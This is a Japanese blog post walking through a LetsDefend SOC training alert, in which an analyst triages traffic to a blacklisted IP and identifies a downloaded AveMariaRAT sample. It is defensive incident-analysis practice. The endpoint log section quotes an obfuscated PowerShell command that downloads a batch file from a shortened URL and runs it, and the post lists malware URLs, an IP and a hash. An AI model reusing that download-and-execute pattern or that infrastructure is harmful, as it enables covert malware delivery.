4ensiX

4ensiX

FPと言ったものはFPを選んだが表示はTPになっていることに気づいた。

LetsDefend level 1 alert SOC112 - Traffic to Blacklisted IP event-id 43

Details

EventID: 43
Event Time: Jan. 31, 2021, 11:02 a.m.
Rule: SOC112 - Traffic to Blacklisted IP
Level: Security Analyst
Source Address 172.16.17.21
Source Hostname Jack
Destination Address 193.239.147.32
Username jack2021
Request URL http[:]//193.239.147.32/OBBBOP.exe
User Agent Mozilla/5.0 (Windows NT 10.0; Microsoft Windows 10.0.15063; en-US) PowerShell/6.0.0
Device Action Allowed

playbook

Search Log

まず、193.239.147.32を調査する。

193.239.147.32

VirusTotal 5/90: https://www.virustotal.com/gui/ip-address/193.239.147.32
ip-sc: https://ip-sc.net/ja/r/193.239.147.32
少し怪しいIPのようだ。AbuseIPDBにはレビューが無いIPであった。
では、このIPに関するアクセスログはどうだろうか。

Log search 193.239.147.32

# DATE TYPE SOURCE ADDRESS SOURCE PORT DESTINATION ADDRESS DESTINATION PORT
336 Jan, 31, 2021, 11:02 AM Firewall 172.16.17.21 23112 193.239.147.32 80
337 Jan, 31, 2021, 11:02 AM Proxy 172.16.17.21 23112 193.239.147.32 80

337

URL: http://193.239.147.32/OBBBOP.exe
Request Method: GET



アラートに関するアクセスのみ

Analyze URL Address

今回アラートの原因となったアクセスを読み解いていく

http[:]//193.239.147.32/OBBBOP.exe

VirusTotal 7/93: https://www.virustotal.com/gui/url/2e84d48d9dbdc2c3c975c75d55ef988aca87868b38a7693f1472da0f5d58610c
URLhaus: https://urlhaus.abuse.ch/url/985031/
まず、URLがURLhausに見つかった。この結果を見るとAveMariaRAT。


このダウンロードOBBOP.exeはどんなものなのか

OBBOP.exe

VirusTotal 58/70: https://www.virustotal.com/gui/file/8dcbe6a1627356b6707223af14e34eaf6b9fde0c9781707b2fb6de4c9b12a742/detection/f-8dcbe6a
ANYRUN: https://app.any.run/tasks/63c3ef83-880e-42c2-b32c-4fe53bf8da57/
ANYRUNで見ると、firefoxに関するデータを抜き取っていそうな動作がある。


Answer: Malicious

Has Anyone Accessed IP/URL/Domain?

193.239.147.32にアクセスし、OBBBOP.exeをダウンロードしたようなので
Answer: Accessed

Containment

Endpointのログではどのようになっているか。

Endpoint - Jack(172.16.17.21)

Browser History

31.01.2021 09:21: https://stackoverflow.com/questions/14551194/how-are-parameters-sent-in-an-http-post-request?rq=1

CMD History

31.01.2021 10:15: cmd /c po^wershe^ll -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).(Down+loadFile).Invoke(http://rebrand.ly/WdBPApoMACRO,a.bat)
31.01.2021 10:16: powershell -w 1 ./a.bat
31.01.2021 10:17: C:/Windows/system32/cmd.exe /c C:/Users/admin/Documents/a.bat

Network Connections

31.01.2021 09:21: 151.101.193.69
31.01.2021 09:22: 151.101.193.69
31.01.2021 09:23: 151.101.193.69
31.01.2021 11:01: 52.206.27.160
31.01.2021 11:02: 193.239.147.32




これらの記録だけだとhttp[:]//193.239.147.32/OBBBOP.exeへのアクセスの経緯は見えてこない。 また、Process HistoryにOBBBOP.exeが無いのでまだ実行していないのか。ログがの残らなかったのか。

Add Artifacts

Value Type Comment
193.239.147.32 IP Address C2 server
http[:]//193.239.147.32/OBBBOP.exe URL Address the server distributing malware
06f4d22f42e1d2406d5dd25c69aa92ac MD5 Hash OOOBBBOP.exe - AveMariaRAT

End

f:id:Zarat:20220213192911p:plain
close alert 43

有名なマルウェアの動きに触れられるのが良い。